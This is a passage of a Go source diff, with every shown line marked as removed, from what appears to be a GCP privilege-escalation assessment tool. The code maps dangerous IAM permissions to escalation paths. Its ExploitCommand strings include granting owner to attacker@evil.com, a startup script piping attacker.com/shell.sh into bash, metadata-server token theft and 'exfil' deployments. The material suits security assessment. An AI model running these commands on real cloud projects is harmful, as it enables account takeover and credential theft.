"cloudfunctions.functions.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function code/SA"}, - {Permission: "cloudfunctions.functions.sourceCodeSet", Category: "Serverless", RiskLevel: "HIGH", Description: "Change function source code"}, - {Permission: "cloudfunctions.functions.call", Category: "Serverless", RiskLevel: "MEDIUM", Description: "Invoke cloud functions"}, - {Permission: "cloudfunctions.functions.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify function IAM policy (make public)"}, - - // Cloud Run - HIGH - {Permission: "run.services.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy services with SA identity"}, - {Permission: "run.services.update", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service code/SA"}, - {Permission: "run.services.setIamPolicy", Category: "Serverless", RiskLevel: "HIGH", Description: "Modify service IAM policy (make public)"}, - {Permission: "run.routes.invoke", Category: "Serverless", RiskLevel: "MEDIUM", Description: "Invoke Cloud Run services"}, - - // Cloud Build - HIGH - {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "CRITICAL", Description: "Run builds with Cloud Build SA"}, - {Permission: "cloudbuild.builds.update", Category: "CI/CD", RiskLevel: "HIGH", Description: "Modify build configurations"}, - - // Cloud Scheduler - HIGH - {Permission: "cloudscheduler.jobs.create", Category: "Scheduler", RiskLevel: "HIGH", Description: "Create scheduled jobs with SA identity"}, - {Permission: "cloudscheduler.locations.list", Category: "Scheduler", RiskLevel: "LOW", Description: "List scheduler locations"}, - - // GKE - HIGH - {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, - {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, - {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, - - // Storage - MEDIUM - {Permission: "storage.buckets.setIamPolicy", Category: "Storage", RiskLevel: "MEDIUM", Description: "Modify bucket access"}, - {Permission: "storage.objects.create", Category: "Storage", RiskLevel: "MEDIUM", Description: "Upload objects to buckets"}, - - // Secrets - HIGH - {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, - {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, - - // Org Policies - CRITICAL - {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "CRITICAL", Description: "Disable organization policy constraints"}, - - // Deployment Manager - CRITICAL - {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "CRITICAL", Description: "Deploy arbitrary infrastructure with DM SA"}, - - // API Keys - MEDIUM - {Permission: "serviceusage.apiKeys.create", Category: "API Keys", RiskLevel: "HIGH", Description: "Create API keys for project access"}, - {Permission: "serviceusage.apiKeys.list", Category: "API Keys", RiskLevel: "MEDIUM", Description: "List existing API keys"}, - - // Actor permissions - {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, - } -} - -// AnalyzeProjectPrivesc analyzes a project for privilege escalation paths -func (s *PrivescService) AnalyzeProjectPrivesc(projectID string) ([]PrivescPath, error) { - return s.AnalyzeProjectPrivescWithName(projectID, projectID) -} - -// AnalyzeProjectPrivescWithName analyzes a project for privilege escalation paths with display name -func (s *PrivescService) AnalyzeProjectPrivescWithName(projectID, projectName string) ([]PrivescPath, error) { - ctx := context.Background() - - // Get project IAM policy - var crmService *crmv1.Service - var err error - - if s.session != nil { - crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) - } else { - crmService, err = crmv1.NewService(ctx) - } - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - - policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - - var paths []PrivescPath - - // Get IAM service for role resolution - var iamService *iam.Service - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } - if err != nil { - // Continue without role resolution - iamService = nil - } - - // Analyze each binding - for _, binding := range policy.Bindings { - if binding == nil { - continue - } - - // Get permissions for this role - permissions := s.getRolePermissions(iamService, binding.Role, projectID) - - // Check each member for dangerous permissions - for _, member := range binding.Members { - memberPaths := s.analyzePermissionsForPrivescWithScope(member, binding.Role, permissions, projectID, "project", projectID, projectName) - paths = append(paths, memberPaths...) - } - } - - return paths, nil -} - -// getRolePermissions resolves a role to its permissions -func (s *PrivescService) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { - if iamService == nil { - return []string{} - } - - ctx := context.Background() - - // Handle different role types - var roleInfo *iam.Role - var err error - - if strings.HasPrefix(role, "roles/") { - // Predefined role - roleInfo, err = iamService.Roles.Get(role).Do() - } else if strings.HasPrefix(role, "projects/") { - // Project custom role - roleInfo, err = iamService.Projects.Roles.Get(role).Do() - } else if strings.HasPrefix(role, "organizations/") { - // Org custom role - roleInfo, err = iamService.Organizations.Roles.Get(role).Do() - } else { - // Assume predefined role format - roleInfo, err = iamService.Roles.Get("roles/" + role).Do() - } - - if err != nil { - // Try to query testable permissions as fallback - return s.getTestablePermissions(ctx, iamService, role, projectID) - } - - return roleInfo.IncludedPermissions -} - -// getTestablePermissions uses QueryTestablePermissions for complex cases -func (s *PrivescService) getTestablePermissions(ctx context.Context, iamService *iam.Service, role string, projectID string) []string { - // This is a simplified version - in production you'd want more robust handling - // For now, return known permissions for common roles - knownRoles := map[string][]string{ - "roles/owner": { - "iam.serviceAccounts.getAccessToken", - "iam.serviceAccountKeys.create", - "resourcemanager.projects.setIamPolicy", - "compute.instances.setMetadata", - }, - "roles/editor": { - "compute.instances.setMetadata", - "cloudfunctions.functions.create", - "run.services.create", - }, - "roles/iam.serviceAccountAdmin": { - "iam.serviceAccountKeys.create", - "iam.serviceAccounts.setIamPolicy", - }, - "roles/iam.serviceAccountKeyAdmin": { - "iam.serviceAccountKeys.create", - }, - "roles/iam.serviceAccountTokenCreator": { - "iam.serviceAccounts.getAccessToken", - "iam.serviceAccounts.signBlob", - "iam.serviceAccounts.signJwt", - }, - "roles/compute.instanceAdmin": { - "compute.instances.setMetadata", - "compute.instances.setServiceAccount", - }, - "roles/cloudfunctions.developer": { - "cloudfunctions.functions.create", - "cloudfunctions.functions.update", - }, - "roles/run.admin": { - "run.services.create", - "run.services.update", - }, - "roles/cloudbuild.builds.editor": { - "cloudbuild.builds.create", - }, - } - - if perms, ok := knownRoles[role]; ok { - return perms - } - - return []string{} -} - -// analyzePermissionsForPrivesc checks if a set of permissions enables privilege escalation -func (s *PrivescService) analyzePermissionsForPrivesc(member, role string, permissions []string, projectID string) []PrivescPath { - var paths []PrivescPath - - dangerousPerms := GetDangerousPermissions() - dangerousMap := make(map[string]DangerousPermission) - for _, dp := range dangerousPerms { - dangerousMap[dp.Permission] = dp - } - - // Check for direct dangerous permissions - foundDangerous := make(map[string]DangerousPermission) - permSet := make(map[string]bool) - for _, perm := range permissions { - permSet[perm] = true - if dp, ok := dangerousMap[perm]; ok { - foundDangerous[perm] = dp - } - } - - // Helper to check if permission exists - hasPerm := func(perm string) bool { - return permSet[perm] - } - - // Generate privesc paths based on found permissions - principalType := getPrincipalType(member) - cleanMember := cleanMemberName(member) - - // ======================================== - // SERVICE ACCOUNT IMPERSONATION - CRITICAL - // ======================================== - - // SA Token Creation (GetServiceAccountAccessToken) - if dp, ok := foundDangerous["iam.serviceAccounts.getAccessToken"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "GetServiceAccountAccessToken", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can generate access tokens for service accounts to impersonate them", - ExploitCommand: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), - ProjectID: projectID, - }) - } - - // SA Key Creation (CreateServiceAccountKey) - if dp, ok := foundDangerous["iam.serviceAccountKeys.create"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "CreateServiceAccountKey", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can create persistent keys for service accounts to impersonate them", - ExploitCommand: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID), - ProjectID: projectID, - }) - } - - // SA Implicit Delegation (ServiceAccountImplicitDelegation) - if dp, ok := foundDangerous["iam.serviceAccounts.implicitDelegation"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ServiceAccountImplicitDelegation", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can delegate permissions between service accounts for chained impersonation", - ExploitCommand: "# Use delegation chain: SA1 -> SA2 -> SA3\ngcloud auth print-access-token --impersonate-service-account=SA3 --delegates=SA1,SA2", - ProjectID: projectID, - }) - } - - // SA SignBlob (ServiceAccountSignBlob) - if dp, ok := foundDangerous["iam.serviceAccounts.signBlob"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ServiceAccountSignBlob", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can sign arbitrary blobs as SA (create GCS signed URLs, forge tokens)", - ExploitCommand: fmt.Sprintf("gsutil signurl -u TARGET_SA@%s.iam.gserviceaccount.com gs://bucket/object", projectID), - ProjectID: projectID, - }) - } - - // SA SignJwt (ServiceAccountSignJwt) - if dp, ok := foundDangerous["iam.serviceAccounts.signJwt"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ServiceAccountSignJwt", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can sign JWTs as SA to impersonate service accounts", - ExploitCommand: "# Sign JWT to get access token as SA\ncurl -X POST -H \"Authorization: Bearer $(gcloud auth print-access-token)\" \\\n -H \"Content-Type: application/json\" \\\n -d '{\"payload\": \"...\"}' \\\n https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/TARGET_SA:signJwt", - ProjectID: projectID, - }) - } - - // ======================================== - // KEY CREATION - // ======================================== - - // HMAC Key Creation (CreateServiceAccountHMACKey) - if dp, ok := foundDangerous["storage.hmacKeys.create"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "CreateServiceAccountHMACKey", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can create HMAC keys for S3-compatible API access as service account", - ExploitCommand: fmt.Sprintf("gsutil hmac create TARGET_SA@%s.iam.gserviceaccount.com", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // IAM POLICY MODIFICATION - CRITICAL - // ======================================== - - // Project IAM Modification (SetProjectIAMPolicy) - if dp, ok := foundDangerous["resourcemanager.projects.setIamPolicy"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "SetProjectIAMPolicy", - TargetResource: projectID, - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can modify project IAM policy to grant any role", - ExploitCommand: fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:attacker@evil.com --role=roles/owner", projectID), - ProjectID: projectID, - }) - } - - // Folder IAM Modification (SetFolderIAMPolicy) - if dp, ok := foundDangerous["resourcemanager.folders.setIamPolicy"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "SetFolderIAMPolicy", - TargetResource: "Folder (inherited to all projects)", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can modify folder IAM policy affecting all child projects", - ExploitCommand: "gcloud resource-manager folders add-iam-policy-binding FOLDER_ID --member=user:attacker@evil.com --role=roles/owner", - ProjectID: projectID, - }) - } - - // Org IAM Modification (SetOrgIAMPolicy) - if dp, ok := foundDangerous["resourcemanager.organizations.setIamPolicy"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "SetOrgIAMPolicy", - TargetResource: "Organization (inherited to all)", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can modify organization IAM policy affecting all folders and projects", - ExploitCommand: "gcloud organizations add-iam-policy-binding ORG_ID --member=user:attacker@evil.com --role=roles/owner", - ProjectID: projectID, - }) - } - - // Service Account IAM Modification (SetServiceAccountIAMPolicy) - if dp, ok := foundDangerous["iam.serviceAccounts.setIamPolicy"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "SetServiceAccountIAMPolicy", - TargetResource: "All project service accounts", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can grant others access to impersonate service accounts", - ExploitCommand: fmt.Sprintf("gcloud iam service-accounts add-iam-policy-binding TARGET_SA@%s.iam.gserviceaccount.com --member=user:attacker@evil.com --role=roles/iam.serviceAccountTokenCreator", projectID), - ProjectID: projectID, - }) - } - - // Update IAM Role (UpdateIAMRole) - if dp, ok := foundDangerous["iam.roles.update"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "UpdateIAMRole", - TargetResource: "Custom IAM roles", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can modify custom IAM roles to add powerful permissions", - ExploitCommand: fmt.Sprintf("gcloud iam roles update ROLE_ID --project=%s --add-permissions=iam.serviceAccountKeys.create", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // ORG POLICY - CRITICAL - // ======================================== - - // Org Policy Modification (SetOrgPolicyConstraints) - if dp, ok := foundDangerous["orgpolicy.policy.set"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "SetOrgPolicyConstraints", - TargetResource: "Organization policies", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can disable organization policy constraints (domain restriction, public access prevention, etc.)", - ExploitCommand: "gcloud org-policies reset constraints/iam.allowedPolicyMemberDomains --project=" + projectID, - ProjectID: projectID, - }) - } - - // ======================================== - // COMPUTE - HIGH - // ======================================== - - // Compute Metadata Modification - if dp, ok := foundDangerous["compute.instances.setMetadata"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ComputeMetadataInjection", - TargetResource: "All project instances", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can inject SSH keys or startup scripts into instances", - ExploitCommand: fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --project=%s --metadata=startup-script='#!/bin/bash\\ncurl http://attacker.com/shell.sh | bash'", projectID), - ProjectID: projectID, - }) - } - - // Create GCE Instance with SA (CreateGCEInstanceWithSA) - // Requires multiple permissions working together - if hasPerm("compute.instances.create") && hasPerm("iam.serviceAccounts.actAs") { - requiredPerms := []string{"compute.instances.create", "iam.serviceAccounts.actAs"} - // Check for additional required permissions - hasAllPerms := true - optionalPerms := []string{"compute.disks.create", "compute.instances.setMetadata", "compute.instances.setServiceAccount", "compute.subnetworks.use"} - for _, p := range optionalPerms { - if hasPerm(p) { - requiredPerms = append(requiredPerms, p) - } - } - if hasAllPerms { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "CreateGCEInstanceWithSA", - TargetResource: "Compute instances with privileged SA", - Permissions: requiredPerms, - RiskLevel: "CRITICAL", - Description: "Can create GCE instance with privileged service account to steal its token", - ExploitCommand: fmt.Sprintf("gcloud compute instances create attacker-vm --project=%s --service-account=PRIVILEGED_SA@%s.iam.gserviceaccount.com --scopes=cloud-platform --metadata=startup-script='curl -s http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token -H \"Metadata-Flavor: Google\"'", projectID, projectID), - ProjectID: projectID, - }) - } - } - - // OS Admin Login - if dp, ok := foundDangerous["compute.instances.osAdminLogin"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "OSAdminLogin", - TargetResource: "All project instances with OS Login", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can SSH into instances with sudo via OS Login", - ExploitCommand: fmt.Sprintf("gcloud compute ssh INSTANCE --project=%s", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // SERVERLESS - CRITICAL/HIGH - // ======================================== - - // Cloud Functions - Create with SA (ExfilCloudFunctionCredsAuthCall) - if hasPerm("cloudfunctions.functions.create") && hasPerm("iam.serviceAccounts.actAs") { - perms := []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs"} - if hasPerm("cloudfunctions.functions.sourceCodeSet") { - perms = append(perms, "cloudfunctions.functions.sourceCodeSet") - } - method := "ExfilCloudFunctionCredsAuthCall" - desc := "Can deploy function with privileged SA and invoke it to exfiltrate credentials" - if hasPerm("cloudfunctions.functions.call") { - perms = append(perms, "cloudfunctions.functions.call") - } - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: method, - TargetResource: "Cloud Functions", - Permissions: perms, - RiskLevel: "CRITICAL", - Description: desc, - ExploitCommand: fmt.Sprintf("gcloud functions deploy exfil --project=%s --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA@%s.iam.gserviceaccount.com --source=. --entry-point=exfil", projectID, projectID), - ProjectID: projectID, - }) - } - - // Cloud Functions - Create with SA and make public (ExfilCloudFunctionCredsUnauthCall) - if hasPerm("cloudfunctions.functions.create") && hasPerm("iam.serviceAccounts.actAs") && hasPerm("cloudfunctions.functions.setIamPolicy") { - perms := []string{"cloudfunctions.functions.create", "iam.serviceAccounts.actAs", "cloudfunctions.functions.setIamPolicy"} - if hasPerm("cloudfunctions.functions.sourceCodeSet") { - perms = append(perms, "cloudfunctions.functions.sourceCodeSet") - } - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ExfilCloudFunctionCredsUnauthCall", - TargetResource: "Cloud Functions (public)", - Permissions: perms, - RiskLevel: "CRITICAL", - Description: "Can deploy function with privileged SA and make it publicly accessible", - ExploitCommand: fmt.Sprintf("gcloud functions deploy exfil --project=%s --runtime=python39 --trigger-http --service-account=PRIVILEGED_SA --allow-unauthenticated", projectID), - ProjectID: projectID, - }) - } - - // Cloud Functions - Update existing function (UpdateCloudFunction) - if hasPerm("cloudfunctions.functions.update") && hasPerm("iam.serviceAccounts.actAs") { - perms := []string{"cloudfunctions.functions.update", "iam.serviceAccounts.actAs"} - if hasPerm("cloudfunctions.functions.sourceCodeSet") { - perms = append(perms, "cloudfunctions.functions.sourceCodeSet") - } - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "UpdateCloudFunction", - TargetResource: "Existing Cloud Functions", - Permissions: perms, - RiskLevel: "CRITICAL", - Description: "Can update existing Cloud Functions with malicious code", - ExploitCommand: fmt.Sprintf("gcloud functions deploy EXISTING_FUNCTION --project=%s --source=. --entry-point=malicious", projectID), - ProjectID: projectID, - }) - } - - // Cloud Run - Create with SA (ExfilCloudRunServiceAuthCall) - if hasPerm("run.services.create") && hasPerm("iam.serviceAccounts.actAs") { - perms := []string{"run.services.create", "iam.serviceAccounts.actAs"} - if hasPerm("run.routes.invoke") { - perms = append(perms, "run.routes.invoke") - } - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ExfilCloudRunServiceAuthCall", - TargetResource: "Cloud Run", - Permissions: perms, - RiskLevel: "CRITICAL", - Description: "Can deploy Cloud Run service with privileged SA to exfiltrate credentials", - ExploitCommand: fmt.Sprintf("gcloud run deploy exfil --project=%s --image=gcr.io/attacker/exfil --service-account=PRIVILEGED_SA@%s.iam.gserviceaccount.com --platform=managed --region=us-central1", projectID, projectID), - ProjectID: projectID, - }) - } - - // Cloud Run - Create with SA and make public (ExfilCloudRunServiceUnauthCall) - if hasPerm("run.services.create") && hasPerm("iam.serviceAccounts.actAs") && hasPerm("run.services.setIamPolicy") { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ExfilCloudRunServiceUnauthCall", - TargetResource: "Cloud Run (public)", - Permissions: []string{"run.services.create", "iam.serviceAccounts.actAs", "run.services.setIamPolicy"}, - RiskLevel: "CRITICAL", - Description: "Can deploy Cloud Run service with privileged SA and make it publicly accessible", - ExploitCommand: fmt.Sprintf("gcloud run deploy exfil --project=%s --image=gcr.io/attacker/exfil --service-account=PRIVILEGED_SA --allow-unauthenticated --platform=managed --region=us-central1", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // CI/CD - CRITICAL - // ======================================== - - // Cloud Build (RCECloudBuildBuildServer) - if dp, ok := foundDangerous["cloudbuild.builds.create"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "RCECloudBuildBuildServer", - TargetResource: "Cloud Build", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can execute arbitrary code via Cloud Build with its service account (often has elevated privileges)", - ExploitCommand: fmt.Sprintf("gcloud builds submit --project=%s --config=cloudbuild.yaml .", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // SCHEDULER - HIGH - // ======================================== - - // Cloud Scheduler (CreateCloudSchedulerHTTPRequest) - if hasPerm("cloudscheduler.jobs.create") && hasPerm("iam.serviceAccounts.actAs") { - perms := []string{"cloudscheduler.jobs.create", "iam.serviceAccounts.actAs"} - if hasPerm("cloudscheduler.locations.list") { - perms = append(perms, "cloudscheduler.locations.list") - } - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "CreateCloudSchedulerHTTPRequest", - TargetResource: "Cloud Scheduler", - Permissions: perms, - RiskLevel: "HIGH", - Description: "Can create scheduled HTTP requests that run as privileged service account", - ExploitCommand: fmt.Sprintf("gcloud scheduler jobs create http exfil --project=%s --schedule='* * * * *' --uri=https://attacker.com/callback --oidc-service-account-email=PRIVILEGED_SA@%s.iam.gserviceaccount.com", projectID, projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // DEPLOYMENT MANAGER - CRITICAL - // ======================================== - - // Deployment Manager (CreateDeploymentManagerDeployment) - if dp, ok := foundDangerous["deploymentmanager.deployments.create"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "CreateDeploymentManagerDeployment", - TargetResource: "Deployment Manager", - Permissions: []string{dp.Permission}, - RiskLevel: "CRITICAL", - Description: "Can deploy arbitrary infrastructure with Deployment Manager service account (often has project owner)", - ExploitCommand: fmt.Sprintf("gcloud deployment-manager deployments create pwned --project=%s --config=deployment.yaml", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // GKE - HIGH - // ======================================== - - // GKE Credentials - if dp, ok := foundDangerous["container.clusters.getCredentials"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "GKEClusterAccess", - TargetResource: "All project GKE clusters", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can get credentials for GKE clusters to access Kubernetes API", - ExploitCommand: fmt.Sprintf("gcloud container clusters get-credentials CLUSTER_NAME --zone=ZONE --project=%s", projectID), - ProjectID: projectID, - }) - } - - // GKE Pod Exec - if dp, ok := foundDangerous["container.pods.exec"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "GKEPodExec", - TargetResource: "All project GKE pods", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can exec into GKE pods to steal service account tokens", - ExploitCommand: "kubectl exec -it POD_NAME -- /bin/sh", - ProjectID: projectID, - }) - } - - // GKE Secrets - if dp, ok := foundDangerous["container.secrets.get"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "GKESecretsAccess", - TargetResource: "All project GKE secrets", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can read Kubernetes secrets including service account tokens", - ExploitCommand: "kubectl get secrets -o yaml", - ProjectID: projectID, - }) - } - - // ======================================== - // SECRETS - HIGH - // ======================================== - - // Secret Access - if dp, ok := foundDangerous["secretmanager.versions.access"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "SecretManagerAccess", - TargetResource: "All project secrets", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can read secret values from Secret Manager", - ExploitCommand: fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET_NAME --project=%s", projectID), - ProjectID: projectID, - }) - } - - // ======================================== - // API KEYS - HIGH/MEDIUM - // ======================================== - - // Create API Key (CreateAPIKey) - if dp, ok := foundDangerous["serviceusage.apiKeys.create"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "CreateAPIKey", - TargetResource: "Project API keys", - Permissions: []string{dp.Permission}, - RiskLevel: "HIGH", - Description: "Can create API keys for project access", - ExploitCommand: fmt.Sprintf("gcloud alpha services api-keys create --project=%s", projectID), - ProjectID: projectID, - }) - } - - // View API Keys (ViewExistingAPIKeys) - if dp, ok := foundDangerous["serviceusage.apiKeys.list"]; ok { - paths = append(paths, PrivescPath{ - Principal: cleanMember, - PrincipalType: principalType, - Method: "ViewExistingAPIKeys", - TargetResource: "Project API keys", - Permissions: []string{dp.Permission}, - RiskLevel: "MEDIUM", - Description: "Can list existing API keys (may contain unrestricted keys)", - ExploitCommand: fmt.Sprintf("gcloud alpha services api-keys list --project=%s", projectID), - ProjectID: projectID, - }) - } - - return paths -} - -// getPrincipalType determines the type of principal from the member string -func getPrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { - return "user" - } else if strings.HasPrefix(member, "serviceAccount:") { - return "serviceAccount" - } else if strings.HasPrefix(member, "group:") { - return "group" - } else if strings.HasPrefix(member, "domain:") { - return "domain" - } else if member == "allUsers" { - return "allUsers" - } else if member == "allAuthenticatedUsers" { - return "allAuthenticatedUsers" - } - return "unknown" -} - -// cleanMemberName removes the prefix from member string -func cleanMemberName(member string) string { - parts := strings.SplitN(member, ":", 2) - if len(parts) == 2 { - return parts[1] - } - return member -} - -// analyzePermissionsForPrivescWithScope is like analyzePermissionsForPrivesc but adds scope information -func (s *PrivescService) analyzePermissionsForPrivescWithScope(member, role string, permissions []string, projectID, scopeType, scopeID, scopeName string) []PrivescPath { - // Get paths from original function - paths := s.analyzePermissionsForPrivesc(member, role, permissions, projectID) - - // Add scope information to each path - for i := range paths { - paths[i].ScopeType = scopeType - paths[i].ScopeID = scopeID - paths[i].ScopeName = scopeName - } - - return paths -} - -// AnalyzeOrganizationPrivesc analyzes all accessible organizations for privilege escalation paths -func (s *PrivescService) AnalyzeOrganizationPrivesc(ctx context.Context) ([]PrivescPath, map[string]string, []string, error) { - var paths []PrivescPath - orgNames := make(map[string]string) - var orgIDs []string - - // Create organizations client - var orgsClient *resourcemanager.OrganizationsClient - var err error - if s.session != nil { - orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) - } else { - orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) - } - if err != nil { - return nil, orgNames, orgIDs, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - defer orgsClient.Close() - - // Get IAM service for role resolution - var iamService *iam.Service - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } - if err != nil { - iamService = nil - } - - // Search for organizations - searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} - it := orgsClient.SearchOrganizations(ctx, searchReq) - for { - org, err := it.Next() - if err == iterator.Done { - break - } - if err != nil { - parsedErr := gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - gcpinternal.HandleGCPError(parsedErr, logger, globals.GCP_PRIVESC_MODULE_NAME, "Could not search organizations") - break - } - - orgID := strings.TrimPrefix(org.Name, "organizations/") - orgNames[orgID] = org.DisplayName - orgIDs = append(orgIDs, orgID) - - // Get IAM policy for this organization - policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ - Resource: org.Name, - }) - if err != nil { - continue - } - - // Analyze each binding for privesc - for _, binding := range policy.Bindings { - permissions := s.getRolePermissions(iamService, binding.Role, "") - for _, member := range binding.Members { - // For org-level bindings, use empty projectID but set scope info - memberPaths := s.analyzePermissionsForPrivescWithScope( - member, binding.Role, permissions, "", - "organization", orgID, org.DisplayName, - ) - paths = append(paths, memberPaths...) - } - } - } - - return paths, orgNames, orgIDs, nil -} - -// AnalyzeFolderPrivesc analyzes all accessible folders for privilege escalation paths -func (s *PrivescService) AnalyzeFolderPrivesc(ctx context.Context) ([]PrivescPath, map[string]string, error) { - var paths []PrivescPath - folderNames := make(map[string]string) - - // Create folders client - var foldersClient *resourcemanager.FoldersClient - var err error - if s.session != nil { - foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) - } else { - foldersClient, err = resourcemanager.NewFoldersClient(ctx) - } - if err != nil { - return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") - } - defer foldersClient.Close() - - // Get IAM service for role resolution - var iamService *iam.Service - if s.session != nil { - iamService, err = iam.NewService(ctx, s.session.GetClientOption()) - } else { - iamService, err = iam.NewService(ctx) - } - if err != nil { - iamService = nil - } - - // Search for folders - searchReq := &resourcemanagerpb.SearchFoldersRequest{} - it 